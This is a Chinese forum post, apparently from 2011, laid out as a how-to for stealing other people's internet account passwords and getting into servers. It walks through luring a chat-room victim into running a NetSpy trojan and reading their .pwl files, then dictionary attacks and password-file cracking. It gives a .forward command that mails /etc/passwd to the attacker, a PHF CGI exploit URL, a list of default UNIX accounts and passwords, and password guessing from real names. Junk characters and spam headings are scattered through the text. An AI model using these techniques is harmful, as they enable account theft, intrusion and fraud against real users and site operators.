亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区

    • <object id="nlumt"><tt id="nlumt"><pre id="nlumt"></pre></tt></object>

    <legend id="nlumt"><mark id="nlumt"></mark></legend>
    <pre id="nlumt"><tt id="nlumt"><rt id="nlumt"></rt></tt></pre>
    <bdo id="nlumt"><delect id="nlumt"></delect></bdo>

      

      汶上信息港
      
標(biāo)題: 如何得到別人的上網(wǎng)帳號(hào)和密碼 [打印本頁(yè)]
      

      
作者: 雜七雜八    時(shí)間: 2011-1-12 21:03
      
標(biāo)題: 如何得到別人的上網(wǎng)帳號(hào)和密碼
      如何得到別人的上網(wǎng)帳號(hào)和密碼,我在這里介紹幾種弱智方法。
      
, Z. H5 }( Q+ I; a; o; i+ |2 A" s$ t方案一:利用特洛伊木馬得到帳號(hào)。必備工具:NTESPY、PWLVIEW。3 u' N$ L9 l& u' }! M3 z% e: f$ ?
      
優(yōu)點(diǎn):只要對(duì)方運(yùn)行了程序就有80%的成功率,而且不需要任何網(wǎng)絡(luò)入侵知識(shí),只要能熟悉的操作上面兩個(gè)軟件即可。NETSPY是全中文軟件,一看就會(huì)。而PWLVIEW又是弱智操作只要在DOS下輸入PWLVIEW然后按回車即可。成功率高,操作簡(jiǎn)單而且用不了多長(zhǎng)時(shí)間是它最大的優(yōu)點(diǎn),只是......
      
8 O9 Y3 a+ \$ J  u1 d5 f缺點(diǎn):只有一個(gè),那就是如何讓對(duì)方乖乖的運(yùn)行你的程序。! }. P0 t# b% p8 y7 q4 h( e' h9 ^
      
提示:先問清你的目標(biāo)和你是不是在一個(gè)城市。
      
- {1 W+ b: }% X6 ]實(shí)戰(zhàn)演戲:一天,我在X海聊天室里尋找目標(biāo),遇見了同在北京的色鵝丟丟。我上前打招呼:丟丟好呀。丟丟說:你好呀。我又說:XXXXXXX(客套話,先和他拉關(guān)系)對(duì)了,我拿到了一個(gè)新程序,要不要看看?丟丟說:好呀,寄給我吧。
      
; o$ |. F9 {, N3 [哈哈,魚上鉤了!先把誘餌程序改個(gè)名,如改成readme之類的東東,然后和一些不相干的東西發(fā)過去,然后你讓他先運(yùn)行README。在這插一句,有一位大俠使用此法時(shí),竟然把控制端程序和NETSPY的說明文件一起發(fā)了過去,真搞不懂他怎么想的。我對(duì)他說,你先運(yùn)行README,是中文說明。丟丟說:好...咦,怎么沒反映呀?(YEAH!)我又說:那你直接運(yùn)行軟件吧。丟丟說:好吧...不錯(cuò)...我說:明天見...開始干活,連上他的機(jī)子后,現(xiàn)在C盤里找到了WIN95的目錄WINDOWS。也有可能是WIN95或WIN98,進(jìn)入后查找*.pwl,然后把所有后綴名為PWL的文件都抓過來,放在你的工具PWLVIEW的子目錄里。在DOS窗口下輸入PWLVIEW然后敲回車,丟丟的上網(wǎng)帳號(hào)和密碼就都顯示出來了。而且以后如果他上網(wǎng),NETSPY就會(huì)通知你,他就再也逃不出你的手掌心了。就算是他換了密碼,你也能在2分鐘內(nèi)再把他搞定。1 z3 e6 w% E8 X( O7 R8 A# ~9 |7 n
      
忠告:你用他的帳號(hào)上網(wǎng)后第一件事就是先去查看他的上網(wǎng)時(shí)間。分析一下他一般幾點(diǎn)上網(wǎng)以避免撞車。
      
4 H% H5 o) ^/ G6 f方案二:利用ISP的疏忽做文章舉。例用工具:EMAILCRK或網(wǎng)絡(luò)刺客
      
% S" ]( _& ]2 I, O2 X優(yōu)點(diǎn):沒什么優(yōu)點(diǎn)
      
6 A( T' n! h$ o3 a! p  g' s2 g缺點(diǎn):要具體情況具體對(duì)待,太麻煩+ Y# r! \$ g8 N9 s
      
提示:平時(shí)多多留神。
      
0 q9 w  }$ J! f2 _譬如,某個(gè)ISP給你開好了帳號(hào),然后又畫蛇添足的給你一個(gè)郵箱,地址是:你的帳號(hào)@xxx.net: D4 [( d: C/ Y8 o% r$ h
      
密碼和你的上網(wǎng)密碼一樣。也就是說,只要你能敲開郵箱的密碼就一切OK了。. r" @3 }; Q$ {6 X: q
      
運(yùn)行EMAILCRK或網(wǎng)絡(luò)刺客,套上字典后就等著。一般沒有XX個(gè)小時(shí)搞不定,不成功的可能性很大,而且破解時(shí)還必須要上網(wǎng)。你的機(jī)子要是快可以開上三四個(gè)窗口,套上不同的字典一起破
      
+ s4 d6 k7 p; b! u9 V1 }  q方案三:侵入郵局主機(jī)然后把PASS檔抓回來,然后用JOHN或JACK套上字典開始破。
      
- E3 A" i& T# C0 G優(yōu)點(diǎn):一次可以破出好多帳號(hào),而且如果運(yùn)氣好還能拿到ROOT,這個(gè)主機(jī)就要?dú)w你控制了。而且破解時(shí)不用上網(wǎng),可以好幾臺(tái)機(jī)子一起破。
      
3 j7 s  v2 Q5 v9 R' f7 a$ |缺點(diǎn):對(duì)于初學(xué)者有一定困難,尤其是只想拿一個(gè)上網(wǎng)帳號(hào)這樣做恐怕會(huì)得不償失。而且被發(fā)現(xiàn)的可能性很大,情節(jié)嚴(yán)重且性質(zhì)惡劣,一定要慎重對(duì)待。3 F6 N9 n/ P9 }% v$ R
      
由于介紹此類的教學(xué)文章比較多,我就不班門弄斧了。 & O6 ]3 V7 R4 j5 b9 V2 a' i! J
      
' q7 }3 ~  Y/ W) F
      
哈哈,我來說說最簡(jiǎn)單的入侵方法。其實(shí)入侵大體的原理相同,主要是利用系統(tǒng)的漏洞(BUG)來做文章。1 e6 ]  @3 Y$ Z) u6 q4 T. O
      
只不過有的網(wǎng)站漏洞難找有的好找而已。一個(gè)好的黑客,就是要能很快的發(fā)現(xiàn)漏洞并加以利用。下面我給大家舉一個(gè)小栗子。
      
1 X/ q$ }3 b* E+ s. p有一天,我去XX熱線申請(qǐng)主頁(yè),發(fā)現(xiàn)那里采用的是機(jī)器自動(dòng)回信,信的大概格式如下:
      
' [& [/ ?5 ]/ L" O. q0 w+ F/ U. |0 z% O2 C& A  j$ M# W
      
------------------------------( h2 e# s+ H, e" W0 @( ?+ N# ~5 U! s
      
4 i& d) j3 i3 s0 l7 W9 F" Q
      
XXX,你好(XX是你在表格上填的名字)
      
, x2 V$ ~& `+ V" W5 Q: j( g你在XX熱線的主頁(yè)空間已開通
      
  n2 L' e) H. @3 @帳戶名:XXX 密碼:11- H% y' u" e% Z) ~
      
-----------XX熱線
      
# ?. \" {2 ?3 g2 b電話:XXXX-XXXXXXXX
      
# P. U0 X! b5 J$ T  K3 s------------------------------
      
, Y* ?; [; S% k
      
4 P9 G- N0 [! o9 k好了,由于是機(jī)器回信,所以那里所有人的初始密碼都是11,而且該熱線要更改密碼要TELNET到郵局主機(jī)去改,有許多網(wǎng)友并沒有接觸過如何T主機(jī),所以他們使用的還是初始密碼11。$ D+ s6 b  V5 S4 T  z
      
開始干活了,打開FTP軟件,輸入XX熱線的IP,密碼11,然后挨個(gè)輸入帳戶名。帳戶名可去XX熱線的主頁(yè)空間列表里查看,先試試AAAA,。。。沒成功,再換一個(gè),AABB。。。還是不行。哈哈,這個(gè)用戶名短,沒準(zhǔn)能行。輸入AA。。。進(jìn)去了。寄下用戶名然后繼續(xù)試,ABC。。。又成功了,看來沒改密碼的人很多呀。試幾個(gè)就行了,現(xiàn)在,你已經(jīng)擁有這些帳戶的控制權(quán)了。& |# G8 e" o2 B5 u, M
      
上面的這個(gè)栗子很簡(jiǎn)單,一般象這么大的漏很難找。要侵入一個(gè)稍微象點(diǎn)話的站臺(tái)就要耗費(fèi)你大量的時(shí)間和金錢,而且還未必能成功。即使成功了,你不改它實(shí)在無趣,改了恐怕會(huì)步馬X的后塵。此人侵入貴陽(yáng)的主機(jī)并把界面換成了一張淫穢圖片。害的自己吃飯不用花錢了。所以我在這里勸大家一句,把這方面的精力放到全心全意為人民服務(wù)上去。實(shí)在不行就去聊天室,看誰(shuí)不聽話就炸他,同樣很過癮的!
      
) j$ H5 K/ C/ y" |  
      
. ?# X' K4 x- t- I# U' f
      
# A2 a% h. E* }                           如何獲得第一個(gè)帳號(hào)! a4 i3 V) ?! k' w. F: P1 _! r* a
      

      
3 ^" R- U7 C" _2 h- Q- N' m% Q1 Z我們這種水平不高的黑客入侵都是先得到系統(tǒng)的一個(gè)有效帳號(hào),進(jìn)入后再利用系統(tǒng)BUG得到ROOT權(quán)限或想辦法得到SHADOW再解密.無論是利用系統(tǒng)漏洞還是得到SHADOW都是有一定規(guī)律可尋的,通常你到一些黑客站點(diǎn)找到對(duì)應(yīng)系統(tǒng)相應(yīng)版本的EXPLOIT編譯后執(zhí)行就行了.我感覺最困難的是獲得第一個(gè)有效的帳號(hào),有時(shí)侯費(fèi)盡力氣也得不到,后來總算是積累了一些經(jīng)驗(yàn),想寫出來和大家交流一下,希望能拋磚引玉,請(qǐng)高手們把更好的方法告訴我.
      
+ k, g' x+ Q( _% d0 v& R1 I; e- \1 g- w: ?! D8 h
      
確定了目標(biāo)以后,我通常是先用匿名FTP去看一下,許多網(wǎng)站都開匿名FTP,帳號(hào)用ANONYMOUS或是FTP,密碼用一個(gè)EMAIL帳號(hào)(當(dāng)然是假的),進(jìn)入后到/etc目錄下把PASSWD拿回來,一般情況下都是一份很不全的名單,只有幾個(gè)系統(tǒng)帳號(hào),那就算白來了:-}但有的時(shí)候會(huì)有比較傻的管理員把一些普通帳號(hào)放進(jìn)去,這就是很重要的信息,雖然只有帳號(hào)沒有密碼,但畢竟邁出了第一步.如果FTP主目錄是drwxr-xr-x,做一個(gè).foward文件傳上去,在UNIX下的命令應(yīng)該是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后給匿名用戶寫一封信,它會(huì)把PASSWD發(fā)給你。; _% D$ p( q. N. ^
      
+ c/ W! g# c- j8 K. A) I6 S  }" N
      
如果目標(biāo)沒有匿名FTP,就通過WWW訪問它的主頁(yè),看看上面有什么信息,例如通過一些聯(lián)系人的EMAIL你就可以發(fā)現(xiàn)一些帳號(hào),有的網(wǎng)頁(yè)上甚至列出了EMAIL通訊錄,這對(duì)黑客來講就是無價(jià)之寶.把這些帳號(hào)記下來,非常有用.
      
, S7 `0 n  }3 X6 ~3 n& E2 y. X( C$ `: N+ w3 m4 o
      
以上幾個(gè)方法都不行的話,那就試試PHF查詢.在瀏覽器的地址欄輸入http://攻擊目標(biāo)/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的話會(huì)顯示出PASSWD來,但是成功率極低:-< 
      
% c' j- |+ p% B  }/ C1 r4 S& C* E7 l7 N9 b6 n6 a$ W
      
還可以利用目標(biāo)的FINGER功能來積累帳號(hào),如利用HAKTEK(一種掃描器)來監(jiān)視目標(biāo),一旦有人登陸該主機(jī)就會(huì)報(bào)告給你.但這種方法的缺點(diǎn)就是浪費(fèi)時(shí)間,如果你是自己花錢上網(wǎng)的話可就要出血了!
      
9 C* S, a8 A- Y+ @! Q5 }" Y- J
      
# N' G# s9 h2 F3 F. F0 V很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系統(tǒng)默認(rèn)的帳號(hào),例如:) x: h- d) a3 x0 u$ S
      
/ P4 L) W8 W+ U
      
帳號(hào)     密碼
      
2 U, W1 c# _$ k  i3 Y# R/ ^----------- ----------------# ?8 D0 ~: c, y
      
root    root
      
2 [9 D6 x2 N( Q. b2 h, W# jsys     sys/system/bin+ D4 E% i* H: x/ m# y: ?% u
      
bin     sys/bin
      
3 r8 Y2 n6 R2 g6 Cmountfsys  mountfsys
      
: E2 r$ E% O1 ~3 K% r+ l# s7 Radm     adm* Y* A$ [& ~! d7 Q
      
uucp    uucp/ N. [8 v; j. x
      
nuucp    anon2 |$ |) w' W- |$ ?$ P1 H
      
anon    anon
      
8 {) L+ z4 `7 a+ m  }% |: Duser    user' a0 W, Z7 C0 b0 h- S8 m
      
games    games
      
7 W; |4 u. u+ t2 T* j' Z7 Pinstall   install8 N* C- C" c, e
      
reboot   給 "command login" 用的
      
; v* C' S* @8 z0 J" i4 V  ?demo    demo+ c: U  N) F- x7 T
      
umountfsys umountfsys
      
1 y$ ?0 `: X9 L3 zsync     sync" q. G, w0 j% P* Z3 [6 z
      
admin    admin* g3 F! B! h% K- K" j* {
      
guest    guest
      
2 ]' L0 k1 N5 X- O, F6 Adaemon   daemon
      
5 b6 _! R" f- r. }6 p2 T________________________________________________________________
      
0 v8 [/ j. |  X7 v8 V8 V3 C& n+ h
      
有些管理員忘記把他們改掉,那你就發(fā)財(cái)了!3 _8 L+ Y) Z9 j$ w
      
7 M! c' ?& C9 Y. d& s5 u
      
另外還有一些習(xí)慣性帳號(hào)如:test,www,html,web,oracle,setup,sybase,john,tom等也都應(yīng)該試一試.
      
" P$ I6 ~1 \: h6 s* b' _, W. a! |4 |4 {" d" m5 r
      
只有帳號(hào)還不能進(jìn)入系統(tǒng),但有了帳號(hào)搞密碼就容易一些了,主要辦法還是猜.如果是通過PASSWD知道帳號(hào)的那你應(yīng)該會(huì)發(fā)現(xiàn)該用戶的許多信息,例如:: ?/ i$ h8 w2 m& V; C# O& E
      
. j( N* ?; t* m6 _
      
........./ R, i  \; \" p9 d
      
. o0 R# i  J6 e5 K9 U2 g8 x
      
xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
      
% p( _, Y$ `6 [  i% o
      
9 R! E& Q9 J/ u, y& Yqingyuan:x:275:50::/usr/qingyuan:/bin/sh: h) x: S! e% Y( v
      
9 A/ F2 I& ?* N5 e1 B' Q" S
      
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh2 l6 s! O4 w, k; x7 z0 C
      

      
' q; M. t! m% a. x6 k, Msmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh# x1 E+ J# a4 w$ B# L7 y: A
      

      
+ d. L% }! b! g4 p% M) j3 F: ~/ \kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh; L2 Z4 b0 [4 d7 T! g
      

      
* y- G6 H, X6 y1 C8 R" ybrlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh  O8 @1 Q; U( P: l% N' O
      
1 \/ M; C$ R6 t
      
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh! z6 Y; v7 F, V! M0 o( V
      

      
: W* d+ A  s- w( [& {............
      
3 Q# W% p( B$ Y3 i1 R, }6 K, i8 @( l! u) ]: u4 M3 ~
      
這是一部分PASSWD,從這兒我們可以得到七個(gè)帳號(hào),注意每一行的第五項(xiàng),那是該用戶的真實(shí)姓名,對(duì)!就用它來做密碼試.成功率還是比較高的., O* J  q% s1 p  ^
      

      
0 J2 Y! {3 K0 U3 w1 o如果是用其他方法獲得帳號(hào)的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個(gè)帳號(hào)support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項(xiàng)來偵察support@xxx.xxx.xxx會(huì)獲得很多該帳號(hào)的信息例如真名實(shí)姓,電話號(hào)碼等就用這些做密碼來猜">如果是用其他方法獲得帳號(hào)的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個(gè)帳號(hào)support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項(xiàng)來偵察support@xxx.xxx.xxx會(huì)獲得很多該帳號(hào)的信息例如真名實(shí)姓,電話號(hào)碼等就用這些做密碼來猜.
      
3 i$ E7 ^4 u1 R: T/ s+ [
      
% t% U8 h  V) h, Z6 a' C: h當(dāng)然最可能的密碼還是帳號(hào)本身和一些帳號(hào)的變形,如帳號(hào)是john,密碼可能是nhoj,john123,john888等.或是一些簡(jiǎn)單數(shù)字.總之是要費(fèi)一番工夫來猜的.
      
3 N* ~% ]0 N2 b, D) Y+ l# V+ r5 B" ?. ^; R
      
如果還猜不出密碼,只好用LETMEIN之類的東西來猜,字典一定要好.否則,你的電話費(fèi)就要.....而且這種方法比較危險(xiǎn),還是不用為好.
      
. E$ e* a* Z: E$ j! `( j% C. u0 `
      
1 h) t1 A7 v% @最后實(shí)在不行還有一種比較卑劣的手段,就是給該網(wǎng)站的網(wǎng)管寫封信,想辦法騙他執(zhí)行特洛伊木馬,然后再.......算了,不說了.
      
& a1 i) I; ?& R
      
" M* j1 R/ `5 o* |7 v8 r) l你可能發(fā)現(xiàn)以上這些方法都不能百分之百的成功,或者說成功率是比較低的,因?yàn)槲乙膊恢栏玫姆椒?但我感到一定有一種更好的方法,希望有高手見到此文能告訴我.9 b. G- l& g3 [3 P7 z- M1 K
      
5 k2 G/ L; _' h: G4 {; F  T
      





      

      

      歡迎光臨 汶上信息港 (http://www.loveproblemguru.com/)

Powered by Discuz! X3.5